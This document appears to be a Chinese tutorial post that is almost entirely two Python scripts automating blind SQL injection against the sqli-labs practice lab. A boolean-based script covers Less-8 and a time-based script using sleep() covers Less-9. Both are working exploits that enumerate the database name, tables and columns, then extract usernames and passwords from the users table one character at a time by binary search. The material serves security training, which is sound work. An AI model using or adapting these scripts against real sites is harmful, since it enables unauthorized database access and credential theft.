布尔盲注:
import requests
#设置靶场网址
url = "http://192.168.1.190/sqli-labs/Less-8/?id=1' and "
#设置请求头信息
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0'
}
#设置页面返回的正确信息和错误信息
flagFalse = ""
flagTrue = "You are in..........."
#一、查找数据库名长度(适用于有错误回显信息)
# for i in range(1,101): #假定数据库名的长度不大于100
# database_length = 0 #存储数据库名长度
# #设置要拼接的url,查询数据库名的长度
# url1 = f"length((select database()))>{i}--+"
# s = requests.get(url+url1,headers=headers)
# if flagFalse in s.content.decode():
# database_length = i
# break
"""适用于没有回显信息"""
for i in range(20,0,-1): #假定数据库名的长度不大于100
database_length = 0 #存储数据库名长度
#设置要拼接的url,查询数据库名的长度
url1 = f"length((select database()))>{i}--+"
s = requests.get(url+url1,headers=headers)
if flagTrue in s.content.decode():
database_length = i + 1
break
#接下来开始判断数据库名具体是什么,使用折半查找方式与阿斯克码值查找
# 由于数据库名由下划线、数字、字母组成,所以最小为48:0,最大为z:122,下划线:95
#二、查找数据库名
database_name = ''
for i in range(1,database_length+1):
low = 48 #最小值
high = 122 #最大值
mid = int((low + high) / 2) # 中间值
while low<high:
url2 = f"ascii(substr((select database()),{i},1))>{mid}--+" #查找数据库名
s = requests.get(url + url2, headers=headers)
if flagTrue in s.content.decode():
low = mid + 1
#low = mid
else:
high = mid
#high = mid - 1
mid = int((low + high) / 2) # 中间值
database_name = database_name + chr(mid) #chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(f"数据库名为:{database_name}")
#三、判断所有表名字符长度(适用于有回显信息)
# for i in range(1,101): #假定所有表名的长度不大于100
# table_length = 0 #存储所有表名长度
# url3 = f'length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>{i}--+'
# s = requests.get(url+url3,headers=headers)
# if flagFalse in s.content.decode():
# table_length = i
# break
"""适用于没有回显信息"""
for i in range(100,0,-1): #假定所有表名的长度不大于100
table_length = 0 #存储所有表名长度
url3 = f'length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>{i}--+'
s = requests.get(url+url3,headers=headers)
if flagTrue in s.content.decode():
table_length = i+1
break
#四、查找所有表名
table_name = ''
for i in range(1,table_length+1):
low = 48 #最小值
high = 122 #最大值
mid = int((low + high) / 2) # 中间值
while low<high:
url4 = f"ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid}--+"
s = requests.get(url + url4, headers=headers)
if flagTrue in s.content.decode():
low = mid + 1
#low = mid
else:
high = mid
#high = mid - 1
mid = int((low + high) / 2) # 中间值
table_name = table_name + chr(mid) #chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(f"{database_name}数据库下有表:{table_name}")
#五、判断所有字段名的长度(适用于有错误回显)
# for i in range(1,101): #假定所有字段名的长度不大于100
# column_length = 0 #存储所有字段名长度
# url5 = f'length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"))>{i}--+'
# s = requests.get(url+url5,headers=headers)
# if flagFalse in s.content.decode():
# column_length = i
# break
"""适用于没有回显信息"""
for i in range(100,0,-1): #假定所有字段名的长度不大于100
column_length = 0 #存储所有字段名长度
url5 = f'length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name="users"))>{i}--+'
s = requests.get(url+url5,headers=headers)
if flagTrue in s.content.decode():
column_length = i
break
#六、查找所有字段名
column_name = ''
for i in range(1,column_length+1):
low = 48 #最小值
high = 122 #最大值
mid = int((low + high) / 2) # 中间值
while low<high:
url6 = f"ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid}--+"
s = requests.get(url + url6, headers=headers)
if flagTrue in s.content.decode():
low = mid + 1
#low = mid
else:
high = mid
#high = mid - 1
mid = int((low + high) / 2) # 中间值
column_name = column_name + chr(mid) #chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(f"表下有:{column_name}字段")
#七、判断一个字段下所有数据的长度(适用于有错误回显)
# for i in range(1,501): #假定所有数据的长度不大于500
# data_length = 0 #存储所有字段名长度
# url7 = f'length((select group_concat(username,id,password) from users))>{i}--+'
# s = requests.get(url+url7,headers=headers)
# if flagFalse in s.content.decode():
# data_length = i
# break
"""适用于没有回显信息"""
for i in range(500,0,-1): #假定所有数据的长度不大于500
data_length = 0 #存储所有字段名长度
url7 = f'length((select group_concat(username,id,password) from users))>{i}--+'
s = requests.get(url+url7,headers=headers)
if flagFalse in s.content.decode():
data_length = i
break
#八、查找所有数据
data = ''
for i in range(1,data_length+1):
low = 32 #最小值
high = 128 #最大值
mid = int((low + high) / 2) # 中间值
while low<high:
url8 = f"ascii(substr((select group_concat(username,id,password) from users),{i},1))>{mid}--+"
s = requests.get(url + url8, headers=headers)
if flagTrue in s.content.decode():
low = mid + 1
#low = mid
else:
high = mid
#high = mid - 1
mid = int((low + high) / 2) # 中间值
data = data + chr(mid)
print(f"表下有数据:{data}")
时间盲注:
import requests
# 设置靶场网址
url = "http://192.168.1.190/sqli-labs/Less-9/?id=1' and "
# 设置请求头信息
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0'
}
# 设置页面返回信息
flagTrue = "You are in..........."
# 一、查找数据库名长度
database_length = 0 # 存储数据库名长度
for i in range(20, 0, -1): # 假定数据库名的长度不大于20,因为sleep函数会使页面强制沉睡,为了效率,使用倒叙遍历
url1 = f"if(length((select database()))>{i},sleep(2),1)--+" # 设置要拼接的url,查询数据库名的长度,为了效率,使用sleep(2)使服务器沉睡2秒即可
s = requests.get(url + url1, headers=headers)
time = s.elapsed.total_seconds() # 获取服务器响应时间
if time > 1: # 判断time>1,而不判断time>2,是因为服务器响应有波动,避免误差
database_length = i + 1
break
print(database_length)
# 接下来开始判断数据库名具体是什么,使用折半查找方式与阿斯克码值查找
# 由于数据库名由下划线、数字、字母组成,所以最小为48:0,最大为z:122,下划线:95
# 二、查找数据库名
database_name = ''
for i in range(1, database_length + 1):
low = 48 # 最小值
high = 122 # 最大值
mid = int((low + high) / 2) # 中间值
while low < high:
url2 = f"if(ascii(substr((select database()),{i},1))>{mid},sleep(0.1),1)--+" # 查找数据库名,为了效率,使用sleep(0.1)使服务器沉睡0.1秒即可
s = requests.get(url + url2, headers=headers)
time = s.elapsed.total_seconds()
if time > 0.05:
low = mid + 1
else:
high = mid
mid = int((low + high) / 2) # 中间值
database_name = database_name + chr(mid) # chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(database_name) # 因为在查找过程中,服务器不时的沉睡,导致python代码执行缓慢,所以可以再此进行一个输出
print(database_name)
# 三、判断所有表名字符长度
for i in range(100, 0, -1): # 假定所有表名的长度不大于100
table_length = 0 # 存储所有表名长度
url3 = f"if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>{i},sleep(2),1)--+"
s = requests.get(url + url3, headers=headers)
time = s.elapsed.total_seconds() # 获取服务器响应时间
if time > 1:
table_length = i + 1
break
print(table_length)
# 四、查找所有表名
table_name = ''
for i in range(1, table_length + 1):
low = 48 # 最小值
high = 122 # 最大值
mid = int((low + high) / 2) # 中间值
while low < high:
url4 = f"if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},sleep(0.1),1)--+"
s = requests.get(url + url4, headers=headers)
time = s.elapsed.total_seconds()
if time > 0.05:
low = mid + 1
else:
high = mid
mid = int((low + high) / 2) # 中间值
table_name = table_name + chr(mid) # chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(table_name) # 同理,再此进行一个输出
print(table_name)
# 五、判断所有字段名的长度
for i in range(100, 0, -1): # 假定所有字段名的长度不大于100
column_length = 0 # 存储所有字段名长度
url5 = f"if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>{i},sleep(2),1)--+"
s = requests.get(url + url5, headers=headers)
time = s.elapsed.total_seconds() # 获取服务器响应时间
if time > 1:
column_length = i + 1
break
print(column_length)
# 六、查找所有字段名
column_name = ''
for i in range(1, column_length + 1):
low = 48 # 最小值
high = 122 # 最大值
mid = int((low + high) / 2) # 中间值
while low < high:
url6 = f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),{i},1))>{mid},sleep(0.1),1)--+"
s = requests.get(url + url6, headers=headers)
time = s.elapsed.total_seconds()
if time > 0.05:
low = mid + 1
else:
high = mid
mid = int((low + high) / 2) # 中间值
column_name = column_name + chr(mid) # chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(column_name) # 同理,再此进行一个输出
print(column_name)
# 七、判断一个字段下所有数据的长度
for i in range(300, 0, -1): # 假定所有数据名的长度不大于300
data_length = 0 # 存储所有数据名长度
url7 = f"if(length((select group_concat(username,password) from users))>{i},sleep(2),1)--+"
s = requests.get(url + url7, headers=headers)
time = s.elapsed.total_seconds() # 获取服务器响应时间
if time > 1:
data_length = i + 1
break
print(data_length)
# 八、查找所有数据
data = ''
for i in range(1, data_length + 1):
low = 48 # 最小值
high = 122 # 最大值
mid = int((low + high) / 2) # 中间值
while low < high:
"""全部显示数据"""
url8 = f"if(ascii(substr((select group_concat(username,id,password) from users),{i},1))>{mid},sleep(0.1),1)--+"
"""不显示全部"""
# url8 = f"if(ascii(substr((select username from users limit 1),{i},1))>{mid},sleep(0.1),1)--+" #为了方便演示,使用limit函数,只查询第一条username数据
s = requests.get(url + url8, headers=headers)
time = s.elapsed.total_seconds()
if time > 0.05:
low = mid + 1
else:
high = mid
mid = int((low + high) / 2) # 中间值
# if chr(mid) == '0':
# break
data = data + chr(mid) # chr函数可以将数字以阿斯克码的形式转化为对应的字母
print(data) # 同理,再此进行一个输出
print(data)
浙公网安备 33010602011771号